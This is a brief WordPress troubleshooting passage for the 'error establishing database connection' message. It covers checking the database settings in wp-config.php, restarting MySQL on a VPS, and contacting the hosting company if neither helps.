Open wp-config.php and check the lines DB_USER, DB_PASSWORD, DB_HOST, DB_NAME. Make sure the values match your MySQL access details.
If you use a dedicated server or VPS hosting, try to restart your MySQL server by typing:
- service mysql restart
or
- service mysql start
But if you use shared hosting, ignore this step!
If none of the previous fixes work, it's a server-side problem! It is not your error, so let the hosting company fix this error for you, because it is their error!
Contact them or give them a day or so and they will solve this error and the problem will disappear automatically.
You can also check this video for the "error establishing database connection" fixes.
